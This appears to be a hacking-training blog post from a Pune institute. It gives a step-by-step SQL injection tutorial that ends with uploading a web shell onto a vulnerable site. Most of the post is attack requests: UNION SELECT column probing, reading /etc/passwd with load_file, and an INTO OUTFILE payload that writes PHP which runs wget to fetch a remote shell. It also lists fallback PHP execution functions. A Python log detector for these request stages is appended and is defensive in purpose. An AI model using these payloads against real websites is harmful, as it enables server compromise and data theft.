Ethical Hacking Training Institute in Pune-India
Extreme Hacking | Sadik Shaikh | Cyber Suraksha Abhiyan


Credits: Mike

Hello Everyone,

Today we will see how to upload a shell through SQL injection (no admin panel needed).

Requirements:

  • Vulnerable site.
  • Shell in txt format [Example: http://[site].com/shell.txt].
  • Your Brain (;

~~~
First, we use an ORDER BY statement to count the number of columns.

http://[site].com/index.php?id=1+order+by+1– [TRUE]
http://[site].com/index.php?id=1+order+by+2– [TRUE]
http://[site].com/index.php?id=1+order+by+3– [TRUE]
http://[site].com/index.php?id=1+order+by+4– [*FALSE*]

Nice work so far. Now we use a UNION SELECT statement:

http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3–

Let’s say that our vulnerable column is 2, so:

http://[site].com/index.php?id=-1+UNION+SELECT+1,user,3+FROM+mysql.user–

And voilà! The MySQL user is Josh (for example).

Let’s continue:

http://[site].com/index.php?id=-1+UNION+SELECT+1,load_file(‘/etc/passwd’),3–

You can see the full path in the passwd file.
As you can see, I got the full path! There are many methods for finding the full path.

[Example for full path: /home/domain/public_html/].

All you need to do now is use the INTO OUTFILE statement.
Example:

http://[site].com/index.php?id=-1+UNION+SELECT+1,2,3+INTO+OUTFILE+”/home/domain/public_html/test_permission.txt”–

Now, if the page loads normally (that is, the returned value is TRUE), we have write access. If not, look for another directory to write to until you get a TRUE value and the page loads normally.

OK, now I will try to upload the shell! :)
Watch and learn:

Quote:http://[site].com/index.php?id=-1+UNION+SELECT+1,”<?php system(‘wget http://othersite.com/shell.txt -O shell.php’); ?>”,3+INTO+OUTFILE+”/home/domain/public_html/login_here_to_upload_shell.php”–

Then just go to the login_here_to_upload_shell.php file and, when it finishes loading, go to shell.php and... tada!
You shelled the website 🙂

If the system() function is disabled, you can try:

  • exec();
  • shell_exec();
  • file_put_contents();
  • fopen(); / fwrite();

More tricks and hacks to come. Enjoy!
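
For defenders, the request sequence walked through above is distinctive in web server access logs. The following is an added example, not part of the original post: it flags each stage (ORDER BY probing, UNION SELECT, load_file, INTO OUTFILE) per client. The function names, the combined log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Stages of the request sequence described in the post, matched on the decoded URL.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("union select",       re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("file read",          re.compile(r"\bload_file\s*\(", re.I)),
    ("file write",         re.compile(r"\binto\s+(out|dump)file\b", re.I)),
]
# Assumed "combined" log format: client IP first, request line in double quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (documentation IP ranges, paths taken from the post).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?id=1+order+by+4-- HTTP/1.1" 500 0',
    '203.0.113.7 - - [10/Jan/2024:10:00:09 +0000] "GET /index.php?id=-1+UNION+SELECT+1,2,3-- HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Jan/2024:10:00:30 +0000] "GET /index.php?id=-1+UNION+SELECT+1,load_file(%27/etc/passwd%27),3-- HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Jan/2024:10:01:02 +0000] "GET /index.php?id=-1+UNION+SELECT+1,2,3+INTO+OUTFILE+%22/home/domain/public_html/test_permission.txt%22-- HTTP/1.1" 200 0',
    '198.51.100.20 - - [10/Jan/2024:10:01:05 +0000] "GET /index.php?id=42 HTTP/1.1" 200 900',
]

def classify(url):
    """Return the stage names matched by one request URL."""
    decoded = unquote_plus(url)                    # '+' and %20 both become spaces
    decoded = re.sub(r"/\*.*?\*/", " ", decoded)   # inline comments used as spacing
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(lines):
    """Collect matched stages per client; a file write is the highest severity."""
    seen = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url, _status = m.groups()
        for stage in classify(url):
            if stage not in seen[ip]:
                seen[ip].append(stage)
    return {ip: ("critical" if "file write" in s else "high", s) for ip, s in seen.items()}

if __name__ == "__main__":
    for ip, (severity, stages) in scan(SAMPLE_LOG).items():
        print(ip, severity, stages)
```

A "file write" hit warrants checking the web root for files created at that time. Parameterized queries remove the injection itself, and a database account without MySQL's FILE privilege cannot use load_file or INTO OUTFILE.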

www.extremehacking.org